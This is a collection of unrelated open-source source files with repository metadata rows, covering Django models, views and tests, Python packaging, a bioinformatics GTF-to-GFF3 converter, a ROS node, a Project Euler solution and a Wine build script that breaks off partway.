item.assessment.pk for item in PeerWorkflowItem.objects.filter(
submission_uuid=submission_uuid, scored=True
)
]
)
class Meta:
ordering = ["started_at", "id"]
app_label = "assessment"
def __repr__(self):
return (
"PeerWorkflowItem(scorer={0.scorer}, author={0.author}, "
"submission_uuid={0.submission_uuid}, "
"started_at={0.started_at}, assessment={0.assessment}, "
"scored={0.scored})"
).format(self)
def __unicode__(self):
return repr(self)
| agpl-3.0 | 7,839,245,104,259,075,000 | 37.778468 | 112 | 0.609557 | false |
yoshrote/valid_model | setup.py | 1 | 1048 | from setuptools import setup, find_packages
setup(name='valid_model',
version='0.4.0',
description="Generic data modeling and validation",
long_description="""\
""",
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='',
author='Joshua Forman',
author_email='[email protected]',
url='https://github.com/yoshrote/valid_model',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=[
'six'
],
entry_points="""
# -*- Entry points: -*-
""",
)
| mit | -5,580,786,748,296,095,000 | 31.75 | 72 | 0.542939 | false |
LookThisCode/DeveloperBus | Season 2013/Brazil/Projects/QueroMe-master/search/tests.py | 1 | 3836 | # -*- coding: utf-8 -*-
from django.db import models
from django.test import TestCase
# use immediate_update on tests
from django.conf import settings
settings.SEARCH_BACKEND = 'search.backends.immediate_update'
from search import register
from search.core import startswith
# ExtraData is used for ForeignKey tests
class ExtraData(models.Model):
name = models.CharField(max_length=500)
description = models.CharField(max_length=500)
def __unicode__(self):
return self.name
class Indexed(models.Model):
extra_data = models.ForeignKey(ExtraData, related_name='indexed_model', null=True)
extra_data2 = models.ForeignKey(ExtraData, null=True)
# Test normal and prefix index
one = models.CharField(max_length=500, null=True)
two = models.CharField(max_length=500)
check = models.BooleanField()
value = models.CharField(max_length=500)
register(Indexed, 'one', search_index='one_index', indexer=startswith)
register(Indexed, ('one', 'two'), search_index='one_two_index')
register(Indexed, 'value', integrate=('one', 'check'), search_index='value_index')
# Test filters
class FiltersIndexed(models.Model):
value = models.CharField(max_length=500)
check = models.BooleanField()
register(FiltersIndexed, 'value', filters={'check':True, }, search_index='checked_index')
class TestIndexed(TestCase):
def setUp(self):
extra_data = ExtraData()
extra_data.save()
Indexed(one=u'foo', two='bar').save()
Indexed(one=u'foo_2', two='bar').save()
for i in range(3):
Indexed(extra_data=extra_data, one=u'OneOne%d' % i).save()
for i in range(3):
Indexed(extra_data=extra_data, one=u'one%d' % i, two='two%d' % i).save()
for i in range(3):
Indexed(extra_data=extra_data, one=(None, u'ÜÄÖ-+!#><|', 'blub')[i],
check=bool(i%2), value=u'value%d test-word' % i).save()
for i in range(3):
FiltersIndexed(check=bool(i%2), value=u'value%d test-word' % i).save()
def test_setup(self):
self.assertEqual(1, len(Indexed.one_two_index.search('foo bar')))
self.assertEqual(len(Indexed.one_index.search('oneo')), 3)
self.assertEqual(len(Indexed.one_index.search('one')), 6)
self.assertEqual(len(Indexed.one_two_index.search('one2')), 1)
self.assertEqual(len(Indexed.one_two_index.search('two')), 0)
self.assertEqual(len(Indexed.one_two_index.search('two1')), 1)
self.assertEqual(len(Indexed.value_index.search('word')), 3)
self.assertEqual(len(Indexed.value_index.search('test-word')), 3)
self.assertEqual(len(Indexed.value_index.search('value0').filter(
check=False)), 1)
self.assertEqual(len(Indexed.value_index.search('value1').filter(
check=True, one=u'ÜÄÖ-+!#><|')), 1)
self.assertEqual(len(Indexed.value_index.search('value2').filter(
check__exact=False, one='blub')), 1)
# test filters
self.assertEqual(len(FiltersIndexed.checked_index.search('test-word')), 1)
self.assertEqual(len(Indexed.value_index.search('foobar')), 0)
def test_change(self):
one = Indexed.one_index.search('oNeone1').get()
one.one = 'oneoneone'
one.save()
value = Indexed.value_index.search('value0').get()
value.value = 'value1 test-word'
value.save()
value.one = 'shidori'
value.value = 'value3 rasengan/shidori'
value.save()
self.assertEqual(len(Indexed.value_index.search('rasengan')), 1)
self.assertEqual(len(Indexed.value_index.search('value3')), 1)
value = Indexed.value_index.search('value3').get()
value.delete()
self.assertEqual(len(Indexed.value_index.search('value3')), 0)
| apache-2.0 | -4,262,808,245,865,043,000 | 35.730769 | 89 | 0.643194 | false |
saydulk/django-wysiwyg | django_wysiwyg/templatetags/wysiwyg.py | 1 | 2413 | from django import template
from django.conf import settings
from django.template.loader import render_to_string
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
register = template.Library()
def get_settings():
"""Utility function to retrieve settings.py values with defaults"""
flavor = getattr(settings, "DJANGO_WYSIWYG_FLAVOR", "yui")
return {
"DJANGO_WYSIWYG_MEDIA_URL": getattr(settings, "DJANGO_WYSIWYG_MEDIA_URL", urljoin(settings.STATIC_URL, flavor) + '/'),
"DJANGO_WYSIWYG_FLAVOR": flavor,
}
@register.simple_tag
def wysiwyg_setup(protocol="http"):
"""
Create the <style> and <script> tags needed to initialize the rich text editor.
Create a local django_wysiwyg/includes.html template if you don't want to use Yahoo's CDN
"""
ctx = {
"protocol": protocol,
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/includes.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
@register.simple_tag
def wysiwyg_editor(field_id, editor_name=None, config=None):
"""
Turn the textarea #field_id into a rich editor. If you do not specify the
JavaScript name of the editor, it will be derived from the field_id.
If you don't specify the editor_name then you'll have a JavaScript object
named "<field_id>_editor" in the global namespace. We give you control of
this in case you have a complex JS ctxironment.
"""
if not editor_name:
editor_name = "%s_editor" % field_id
ctx = {
'field_id': field_id,
'editor_name': editor_name,
'config': config
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/editor_instance.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
@register.simple_tag
def wysiwyg_static_url(appname, prefix, default_path):
"""
Automatically use an prefix if a given application is installed.
For example, if django-ckeditor is installed, use it's STATIC_URL/ckeditor folder to find the CKEditor distribution.
When the application does not available, fallback to the default path.
This is a function for the internal templates of *django-wysiwyg*.
"""
if appname in settings.INSTALLED_APPS:
return urljoin(settings.STATIC_URL, prefix)
else:
return default_path
| mit | -7,762,174,823,449,520,000 | 28.790123 | 126 | 0.675508 | false |
nextgenusfs/funannotate | funannotate/utilities/stringtie2gff3.py | 1 | 3977 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import argparse
import funannotate.library as lib
def dict2gff3(input):
from collections import OrderedDict
'''
function to convert funannotate gene dictionary to gff3 output
'''
def _sortDict(d):
return (d[1]['contig'], d[1]['location'][0])
# sort the annotations by contig and start location
sGenes = sorted(iter(input.items()), key=_sortDict)
sortedGenes = OrderedDict(sGenes)
# then loop through and write GFF3 format
sys.stdout.write("##gff-version 3\n")
for k, v in list(sortedGenes.items()):
sys.stdout.write("{:}\t{:}\tgene\t{:}\t{:}\t.\t{:}\t.\tID={:};\n".format(
v['contig'], v['source'], v['location'][0], v['location'][1], v['strand'], k))
for i in range(0, len(v['ids'])):
# build extra annotations for each transcript if applicable
# now write mRNA feature
sys.stdout.write("{:}\t{:}\t{:}\t{:}\t{:}\t.\t{:}\t.\tID={:};Parent={:};TPM={:}\n".format(
v['contig'], v['source'], v['type'], v['location'][0], v['location'][1], v['strand'], v['ids'][i], k, v['tpm'][i]))
if v['type'] == 'mRNA':
if '5UTR' in v:
# if 5'UTR then write those first
num_5utrs = len(v['5UTR'][i])
if num_5utrs > 0:
for z in range(0, num_5utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tfive_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr5p{:};Parent={:};\n".format(
v['contig'], v['source'], v['5UTR'][i][z][0], v['5UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
# write the exons
num_exons = len(v['mRNA'][i])
for x in range(0, num_exons):
ex_num = x + 1
sys.stdout.write("{:}\t{:}\texon\t{:}\t{:}\t.\t{:}\t.\tID={:}.exon{:};Parent={:};\n".format(
v['contig'], v['source'], v['mRNA'][i][x][0], v['mRNA'][i][x][1], v['strand'], v['ids'][i], ex_num, v['ids'][i]))
# if 3'UTR then write
if '3UTR' in v:
num_3utrs = len(v['3UTR'][i])
if num_3utrs > 0:
for z in range(0, num_3utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tthree_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr3p{:};Parent={:};\n".format(
v['contig'], v['source'], v['3UTR'][i][z][0], v['3UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
if v['type'] == 'mRNA':
num_cds = len(v['CDS'][i])
# GFF3 phase is 1 less than flat file
current_phase = v['codon_start'][i] - 1
for y in range(0, num_cds):
sys.stdout.write("{:}\t{:}\tCDS\t{:}\t{:}\t.\t{:}\t{:}\tID={:}.cds;Parent={:};\n".format(
v['contig'], v['source'], v['CDS'][i][y][0], v['CDS'][i][y][1], v['strand'], current_phase, v['ids'][i], v['ids'][i]))
current_phase = (
current_phase - (int(v['CDS'][i][y][1]) - int(v['CDS'][i][y][0]) + 1)) % 3
if current_phase == 3:
current_phase = 0
def main(args):
# setup menu with argparse
parser = argparse.ArgumentParser(prog='stringtie2gff.py',
description='''Script to convert StringTie GTF file to GFF3.''',
epilog="""Written by Jon Palmer (2018) [email protected]""")
parser.add_argument('-i', '--input', required=True,
help='StringTie GTF file')
args = parser.parse_args(args)
Genes = lib.gtf2dict(args.input)
dict2gff3(Genes)
if __name__ == "__main__":
main(sys.argv[1:])
| bsd-2-clause | -5,736,459,926,717,889,000 | 49.341772 | 144 | 0.451848 | false |
SEL-Columbia/commcare-hq | corehq/apps/importer/views.py | 1 | 10857 | import os.path
from django.http import HttpResponseRedirect, HttpResponseServerError
from casexml.apps.case.models import CommCareCase
from corehq.apps.importer import base
from corehq.apps.importer import util as importer_util
from corehq.apps.importer.tasks import bulk_import_async
from django.views.decorators.http import require_POST
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.models import Permissions
from corehq.apps.app_manager.models import ApplicationBase
from soil.util import expose_download
from soil import DownloadBase
from soil.heartbeat import heartbeat_enabled, is_alive
from django.template.context import RequestContext
from django.contrib import messages
from django.shortcuts import render, render_to_response
from django.utils.translation import ugettext as _
require_can_edit_data = require_permission(Permissions.edit_data)
EXCEL_SESSION_ID = "excel_id"
def render_error(request, domain, message):
""" Load error message and reload page for excel file load errors """
messages.error(request, _(message))
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain))
@require_can_edit_data
def excel_config(request, domain):
if request.method != 'POST':
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain))
if not request.FILES:
return render_error(request, domain, 'Please choose an Excel file to import.')
named_columns = request.POST.get('named_columns') == "on"
uploaded_file_handle = request.FILES['file']
extension = os.path.splitext(uploaded_file_handle.name)[1][1:].strip().lower()
# NOTE: We may not always be able to reference files from subsequent
# views if your worker changes, so we have to store it elsewhere
# using the soil framework.
if extension not in importer_util.ExcelFile.ALLOWED_EXTENSIONS:
return render_error(request, domain,
'The Excel file you chose could not be processed. '
'Please check that it is saved as a Microsoft '
'Excel 97/2000 .xls file.')
# stash content in the default storage for subsequent views
file_ref = expose_download(uploaded_file_handle.read(), expiry=1*60*60)
request.session[EXCEL_SESSION_ID] = file_ref.download_id
spreadsheet = importer_util.get_spreadsheet(file_ref, named_columns)
if not spreadsheet:
return _spreadsheet_expired(request, domain)
columns = spreadsheet.get_header_columns()
row_count = spreadsheet.get_num_rows()
if row_count == 0:
return render_error(request, domain,
'Your spreadsheet is empty. '
'Please try again with a different spreadsheet.')
case_types_from_apps = []
# load types from all modules
for row in ApplicationBase.view('app_manager/types_by_module',
reduce=True,
group=True,
startkey=[domain],
endkey=[domain,{}]).all():
if not row['key'][1] in case_types_from_apps:
case_types_from_apps.append(row['key'][1])
case_types_from_cases = []
# load types from all case records
for row in CommCareCase.view('hqcase/types_by_domain',
reduce=True,
group=True,
startkey=[domain],
endkey=[domain,{}]).all():
if row['key'][1] and not row['key'][1] in case_types_from_cases:
case_types_from_cases.append(row['key'][1])
# for this we just want cases that have data but aren't being used anymore
case_types_from_cases = filter(lambda x: x not in case_types_from_apps, case_types_from_cases)
if len(case_types_from_apps) == 0 and len(case_types_from_cases) == 0:
return render_error(request, domain,
'No cases have been submitted to this domain and there are no '
'applications yet. You cannot import case details from an Excel '
'file until you have existing cases or applications.')
return render(request, "importer/excel_config.html", {
'named_columns': named_columns,
'columns': columns,
'case_types_from_cases': case_types_from_cases,
'case_types_from_apps': case_types_from_apps,
'domain': domain,
'report': {
'name': 'Import: Configuration'
},
'slug': base.ImportCases.slug})
@require_POST
@require_can_edit_data
def excel_fields(request, domain):
named_columns = request.POST['named_columns']
case_type = request.POST['case_type']
search_column = request.POST['search_column']
search_field = request.POST['search_field']
create_new_cases = request.POST.get('create_new_cases') == 'on'
key_value_columns = request.POST.get('key_value_columns') == 'on'
key_column = ''
value_column = ''
download_ref = DownloadBase.get(request.session.get(EXCEL_SESSION_ID))
spreadsheet = importer_util.get_spreadsheet(download_ref, named_columns)
if not spreadsheet:
return _spreadsheet_expired(request, domain)
columns = spreadsheet.get_header_columns()
if key_value_columns:
key_column = request.POST['key_column']
value_column = request.POST['value_column']
excel_fields = []
key_column_index = columns.index(key_column)
# if key/value columns were specified, get all the unique keys listed
if key_column_index:
excel_fields = spreadsheet.get_unique_column_values(key_column_index)
# concatenate unique key fields with the rest of the columns
excel_fields = columns + excel_fields
# remove key/value column names from list
excel_fields.remove(key_column)
if value_column in excel_fields:
excel_fields.remove(value_column)
else:
excel_fields = columns
case_fields = importer_util.get_case_properties(domain, case_type)
# hide search column and matching case fields from the update list
try:
excel_fields.remove(search_column)
except:
pass
try:
case_fields.remove(search_field)
except:
pass
# we can't actually update this so don't show it
try:
case_fields.remove('type')
except:
pass
return render(request, "importer/excel_fields.html", {
'named_columns': named_columns,
'case_type': case_type,
'search_column': search_column,
'search_field': search_field,
'create_new_cases': create_new_cases,
'key_column': key_column,
'value_column': value_column,
'columns': columns,
'excel_fields': excel_fields,
'case_fields': case_fields,
'domain': domain,
'report': {
'name': 'Import: Match columns to fields'
},
'slug': base.ImportCases.slug})
@require_POST
@require_can_edit_data
def excel_commit(request, domain):
config = importer_util.ImporterConfig.from_request(request)
excel_id = request.session.get(EXCEL_SESSION_ID)
excel_ref = DownloadBase.get(excel_id)
spreadsheet = importer_util.get_spreadsheet(excel_ref, config.named_columns)
if not spreadsheet:
return _spreadsheet_expired(request, domain)
if spreadsheet.has_errors:
messages.error(request, _('The session containing the file you '
'uploaded has expired - please upload '
'a new one.'))
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain) + "?error=cache")
download = DownloadBase()
download.set_task(bulk_import_async.delay(
download.download_id,
config,
domain,
excel_id,
))
try:
del request.session[EXCEL_SESSION_ID]
except KeyError:
pass
return render(request, "importer/excel_commit.html", {
'download_id': download.download_id,
'template': 'importer/partials/import_status.html',
'domain': domain,
'report': {
'name': 'Import: Completed'
},
'slug': base.ImportCases.slug})
@require_can_edit_data
def importer_job_poll(request, domain, download_id, template="importer/partials/import_status.html"):
download_data = DownloadBase.get(download_id)
is_ready = False
if download_data is None:
download_data = DownloadBase(download_id=download_id)
try:
if download_data.task.failed():
return HttpResponseServerError()
except (TypeError, NotImplementedError):
# no result backend / improperly configured
pass
alive = True
if heartbeat_enabled():
alive = is_alive()
context = RequestContext(request)
if download_data.task.result and 'error' in download_data.task.result:
error = download_data.task.result['error']
if error == 'EXPIRED':
return _spreadsheet_expired(request, domain)
elif error == 'HAS_ERRORS':
messages.error(request, _('The session containing the file you '
'uploaded has expired - please upload '
'a new one.'))
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain) + "?error=cache")
if download_data.task.state == 'SUCCESS':
is_ready = True
context['result'] = download_data.task.result
context['is_ready'] = is_ready
context['is_alive'] = alive
context['progress'] = download_data.get_progress()
context['download_id'] = download_id
return render_to_response(template, context_instance=context)
def _spreadsheet_expired(req, domain):
messages.error(req, _('Sorry, your session has expired. Please start over and try again.'))
return HttpResponseRedirect(base.ImportCases.get_url(domain))
| bsd-3-clause | 287,405,050,665,804,160 | 39.511194 | 101 | 0.590771 | false |
brianloveswords/webpagemaker | webpagemaker/api/migrations/0004_lowercase_short_url_ids.py | 1 | 1316 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
NUMERALS = "3fldc4mzjyqr7bkug5vh0a68xpon9stew12i"
def rebase(num, numerals=NUMERALS):
base = len(numerals)
left_digits = num // base
if left_digits == 0:
return numerals[num % base]
else:
return rebase(left_digits, numerals) + numerals[num % base]
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
for page in orm.Page.objects.all():
page.short_url_id = rebase(page.id)
page.save()
def backwards(self, orm):
"Write your backwards methods here."
raise RuntimeError("Cannot go back.")
models = {
'api.page': {
'Meta': {'object_name': 'Page'},
'html': ('django.db.models.fields.TextField', [], {'max_length': '10000'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'short_url_id': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'})
}
}
complete_apps = ['api']
symmetrical = True
| mpl-2.0 | 162,472,665,847,516,580 | 31.9 | 126 | 0.587386 | false |
EndPointCorp/lg_ros_nodes | lg_media/scripts/browser_player.py | 1 | 1133 | #!/usr/bin/env python3
import rospy
from lg_msg_defs.msg import AdhocMedias
from lg_media import DirectorMediaBridge
from interactivespaces_msgs.msg import GenericMessage
from lg_common.helpers import handle_initial_state
from lg_common.helpers import run_with_influx_exception_handler
DEFAULT_VIEWPORT = 'center'
MEDIA_TYPE = 'browser_video'
VIDEOSYNC_URL = 'http://lg-head/lg_sv/webapps/videosync'
NODE_NAME = 'lg_media_service_browser_player'
def main():
rospy.init_node(NODE_NAME, anonymous=True)
viewport_name = rospy.get_param('~viewport', DEFAULT_VIEWPORT)
topic_name = '/media_service/browser/%s' % viewport_name
adhoc_media_publisher = rospy.Publisher(topic_name, AdhocMedias,
queue_size=3)
director_bridge = DirectorMediaBridge(adhoc_media_publisher, viewport_name, MEDIA_TYPE)
rospy.Subscriber('/director/scene', GenericMessage,
director_bridge.translate_director)
handle_initial_state(director_bridge.translate_director)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
| apache-2.0 | 6,909,703,112,144,728,000 | 34.40625 | 91 | 0.713151 | false |
paulmcquad/projecteuler | 0-100/problem31.py | 1 | 1448 | #http://users.softlab.ntua.gr/~ttsiod/euler31.html
#!/usr/bin/env python
# the 8 coins correspond to 8 columns
coins = [1, 2, 5, 10, 20, 50, 100, 200]
TARGET=200
matrix = {}
for y in xrange(0, TARGET+1):
# There is only one way to form a target sum N
# via 1-cent coins: use N 1-cents!
matrix[y, 0] = 1 # equivalent to matrix[(y,0)]=1
for y in xrange(0, TARGET+1):
print y, ":", 1,
for x in xrange(1, len(coins)):
matrix[y, x] = 0
# Is the target big enough to accomodate coins[x]?
if y>=coins[x]:
# If yes, then the number of ways to form
# the target sum are obtained via:
#
# (a) the number of ways to form this target
# using ONLY coins less than column x
# i.e. matrix[y][x-1]
matrix[y, x] += matrix[y, x-1]
# plus
# (b) the number of ways to form this target
# when USING the coin of column x
# which means for a remainder of y-coins[x]
# i.e. matrix[y-coins[x]][x]
matrix[y, x] += matrix[y-coins[x], x]
else:
# if the target is not big enough to allow
# usage of the coin in column x,
# then just copy the number of ways from the
# column to the left (i.e. with smaller coins)
matrix[y, x] = matrix[y, x-1]
print matrix[y, x],
print
| gpl-3.0 | -9,069,959,849,210,606,000 | 31.909091 | 59 | 0.529006 | false |
mattintosh4/nihonshu | build.py | 1 | 25063 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from subprocess import *
import os
import re
import sys
import shutil
INSTALL_ROOT = '/usr/local/wine'
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
DEPOSROOT = os.path.join(PROJECT_ROOT, 'depos')
SRCROOT = os.path.join(PROJECT_ROOT, 'src')
PATCHROOT = os.path.join(PROJECT_ROOT, 'osx-wine-patch')
BUILDROOT = os.path.join(os.path.expandvars('$TMPDIR'), 'build', 'wine')
W_PREFIX = INSTALL_ROOT
W_BINDIR = os.path.join(W_PREFIX, 'bin')
W_DATADIR = os.path.join(W_PREFIX, 'share')
W_DOCDIR = os.path.join(W_DATADIR, 'doc')
W_INCDIR = os.path.join(W_PREFIX, 'include')
W_LIBDIR = os.path.join(W_PREFIX, 'lib')
W_LIBEXECDIR = os.path.join(W_PREFIX, 'libexec')
PREFIX = os.path.join(W_PREFIX, 'SharedSupport')
BINDIR = os.path.join(PREFIX, 'bin')
SBINDIR = os.path.join(PREFIX, 'sbin')
DATADIR = os.path.join(PREFIX, 'share')
DOCDIR = os.path.join(DATADIR, 'doc')
INCDIR = os.path.join(PREFIX, 'include')
LIBDIR = os.path.join(PREFIX, 'lib')
SYSCONFDIR = os.path.join(PREFIX, 'etc')
def message(strings, color = 'green'):
color = {
'red' : 31,
'green' : 32,
'orange': 33,
}[color]
print >> sys.stdout, """\033[{color}m*** {strings} ***\033[m""".format(**locals().copy())
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
message('created: ' + path)
def rm(path):
if not os.path.exists(path): return
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
message('removed: ' + path, 'red')
def installFile(src, dst, mode = 0644):
makedirs(os.path.dirname(dst))
shutil.copy(src, dst)
os.chmod(dst, mode)
message('installed: %s -> %s' % (src, dst))
def installDoc(name, *args):
docdir = os.path.join(W_DOCDIR, name)
makedirs(docdir)
for f in args:
installFile(os.path.join(BUILDROOT, name, f),
os.path.join(docdir, os.path.basename(f)))
#-------------------------------------------------------------------------------
not os.path.exists(BUILDROOT) or rm(BUILDROOT)
not os.path.exists(W_PREFIX) or rm(W_PREFIX)
for f in [
DEPOSROOT,
BUILDROOT,
W_BINDIR,
W_DATADIR,
W_INCDIR,
W_LIBDIR,
W_LIBEXECDIR,
os.path.join(W_DATADIR, "wine", "plugin", "inf"),
BINDIR,
SBINDIR,
DATADIR,
DOCDIR,
INCDIR,
SYSCONFDIR,
]:
makedirs(f)
os.symlink(W_LIBDIR, LIBDIR)
import build_preset as my
my.PREFIX = PREFIX
my.main()
GCC = my.GCC
GXX = my.GXX
CLANG = my.CLANG
CLANGXX = my.CLANGXX
P7ZIP = my.P7ZIP
get_stdout = my.get_stdout
vsh = my.vsh
cabextract = my.cabextract
git_checkout = my.git_checkout
hg_update = my.hg_update
p7zip = my.p7zip
autotools = my.Autotools()
autogen = autotools.autogen
autoreconf = autotools.autoreconf
#-------------------------------------------------------------------------------
class BuildCommands(object):
def __init__(self):
global ncpu
global triple
ncpu = str(int(int(get_stdout('sysctl', '-n', 'hw.ncpu')) * 1.5))
triple = 'i686-apple-darwin' + os.uname()[2]
def reposcopy(self, name):
src = os.path.join(PROJECT_ROOT, 'src', name)
dst = os.path.join(BUILDROOT, name)
shutil.copytree(src, dst, True)
os.chdir(dst)
def configure(self, *args, **kwargs):
pre_args = (
'--enable-shared',
'--disable-dependency-tracking'
)
kwargs.setdefault('prefix', PREFIX)
kwargs.setdefault('triple', triple)
kwargs.setdefault('args', ' '.join(pre_args + args))
vsh(
"""
./configure --prefix={prefix} --build={triple} {args}
""".format(**kwargs))
def make_install(self, **kwargs):
kwargs.setdefault('archive', False)
kwargs.setdefault('check', False)
kwargs.setdefault('parallel', True)
kwargs.setdefault('make', 'make -j {0}'.format(ncpu))
kwargs.setdefault('make_check', 'make check')
kwargs.setdefault('make_args', '')
kwargs['parallel'] or kwargs.update(make = 'make')
kwargs['check'] or kwargs.update(make_check = ':')
vsh('{make} {make_args} && {make_check} && make install'.format(**kwargs))
if kwargs['archive'] is not False:
binMake(kwargs['archive'])
def patch(self, *args):
for f in args:
vsh('patch -Np1 < {0}'.format(f))
buildCommands = BuildCommands()
reposcopy = buildCommands.reposcopy
configure = buildCommands.configure
make_install = buildCommands.make_install
patch = buildCommands.patch
def extract(name, ext, dirname = ''):
d = dict(
dstroot = BUILDROOT,
srcroot = SRCROOT,
f = name + ext,
p7zip = P7ZIP,
)
if ext.endswith('.xz'):
cmd = """{p7zip} x -so {srcroot}/{f} | tar xf - -C {dstroot}""".format(**d)
else:
cmd = """tar xf {srcroot}/{f} -C {dstroot}""".format(**d)
vsh(cmd)
if dirname:
os.chdir(os.path.join(BUILDROOT, dirname))
else:
os.chdir(os.path.join(BUILDROOT, name))
print >> sys.stderr, os.getcwd()
def binMake(name):
srcroot = BUILDROOT
dstroot = DEPOSROOT
vsh(
"""
tar czf {dstroot}/{name}.tar.gz \
--exclude=".git*" \
--exclude=".svn*" \
--exclude=".hg*" \
-C {srcroot} {name}
""".format(**locals().copy()))
def binCheck(name):
srcroot = DEPOSROOT
dstroot = BUILDROOT
if not os.path.exists(os.path.join(srcroot, name + '.tar.gz')): return False
vsh(
"""
tar xf {srcroot}/{name}.tar.gz -C {dstroot}
cd {dstroot}/{name}
make install
""".format(**locals().copy()))
return True
#-------------------------------------------------------------------------------
def install_core_resources():
# note install project license
f = 'LICENSE'
installFile(os.path.join(PROJECT_ROOT, f),
os.path.join(W_DOCDIR, 'nihonshu', f))
# note: install python module
f = 'createwineprefix.py'
os.link(os.path.join(PROJECT_ROOT, f),
os.path.join(W_BINDIR, f))
# note: install inf
f = 'osx-wine.inf'
os.link(os.path.join(PROJECT_ROOT, 'osx-wine-inf', f),
os.path.join(W_DATADIR, 'wine/plugin/inf', f))
def install_plugin():
def install_plugin_7z():
src = os.path.join(PROJECT_ROOT, 'rsrc/7z922.exe')
dst = os.path.join(destroot, '7-Zip')
p7zip('x', '-o' + dst, src, '-x!$*')
src = os.path.join(PROJECT_ROOT, 'inf/7z.inf')
dst = os.path.join(destroot, 'inf/7z.inf')
installFile(src, dst)
def install_plugin_vsrun6():
src = os.path.join(PROJECT_ROOT, 'rsrc/vsrun6sp6/Vs6sp6.exe')
# Visual Basic 6.0 SP 6 ------------------------------------------------
dst = os.path.join(destroot, 'vbrun6sp6')
sub_src = 'vbrun60.cab'
cabextract('-L', '-d', dst, '-F', sub_src, src)
sub_src = os.path.join(dst, sub_src)
cabextract('-L', '-d', dst, sub_src)
os.remove(sub_src)
# Visual C++ 6.0 SP 6 --------------------------------------------------
dst = os.path.join(destroot, 'vcrun6sp6')
sub_src = 'vcredist.exe'
cabextract('-L', '-d', dst, '-F', sub_src, src)
destroot = os.path.join(W_DATADIR, 'wine/plugin')
dx9_feb2010 = os.path.join(PROJECT_ROOT, 'rsrc/directx9/directx_feb2010_redist.exe')
dx9_jun2010 = os.path.join(PROJECT_ROOT, 'rsrc/directx9/directx_Jun2010_redist.exe')
vcrun2005 = os.path.join(PROJECT_ROOT, 'rsrc/vcrun2005sp1_jun2011')
vcrun2008 = os.path.join(PROJECT_ROOT, 'rsrc/vcrun2008sp1_jun2011')
vcrun2010 = os.path.join(PROJECT_ROOT, 'rsrc/vcrun2010sp1_aug2011')
makedirs(destroot)
# INSTALL RUNTIME ----------------------------------------------------------
p7zip('x', '-o' + os.path.join(destroot, 'directx9/feb2010'), dx9_feb2010, '-x!*_x64.cab')
p7zip('x', '-o' + os.path.join(destroot, 'directx9/jun2010'), dx9_jun2010, '-x!*_x64.cab', '-x!*200?*', '-x!Feb2010*')
shutil.copytree(vcrun2005, os.path.join(destroot, 'vcrun2005sp1_jun2011'))
shutil.copytree(vcrun2008, os.path.join(destroot, 'vcrun2008sp1_jun2011'))
shutil.copytree(vcrun2010, os.path.join(destroot, 'vcrun2010sp1_aug2011'))
install_plugin_vsrun6()
install_plugin_7z()
# INSTALL INF --------------------------------------------------------------
for f in [
'inf/dxredist.inf',
'inf/vsredist.inf',
'inf/win2k.reg',
'inf/winxp.reg',
]:
src = os.path.join(PROJECT_ROOT, f)
dst = os.path.join(destroot, 'inf')
dst = os.path.join(dst, os.path.basename(f))
installFile(src, dst)
#-------------------------------------------------------------------------------
# FREETYPE ---------------------------------------------------------------------
def build_freetype(name = 'freetype'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
autogen()
configure(
'--with-old-mac-fonts',
)
make_install(archive = name)
# GETTEXT ----------------------------------------------------------------------
def build_gettext(name = 'gettext-0.18.3.1'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-csharp',
'--disable-java',
'--disable-native-java',
'--disable-openmp',
'--enable-threads=posix',
'--with-included-gettext',
'--with-included-glib',
'--with-included-libcroro',
'--with-included-libunistring',
'--without-cvs',
'--without-emacs',
'--without-git',
)
make_install(archive = name)
# GLIB -------------------------------------------------------------------------
def build_glib(name = 'glib'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('glib-2-38')
autogen()
configure(
'--disable-fam',
'--disable-selinux',
'--disable-silent-rules',
'--disable-xattr',
'--with-threads=posix',
)
make_install(archive = name)
# GMP --------------------------------------------------------------------------
def build_gmp(name = 'gmp-5.1'):
message(name)
if binCheck(name): return
reposcopy(name)
hg_update()
autoreconf()
vsh(
"""
grep '^@set' .bootstrap > doc/version.texi
unset CFLAGS CXXFLAGS
./configure --prefix={prefix} ABI=32
""".format(
prefix = PREFIX,
))
make_install(check = True, archive = name)
# GNUTLS -----------------------------------------------------------------------
def build_libtasn1(name = 'libtasn1-3.3'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-gtk-doc',
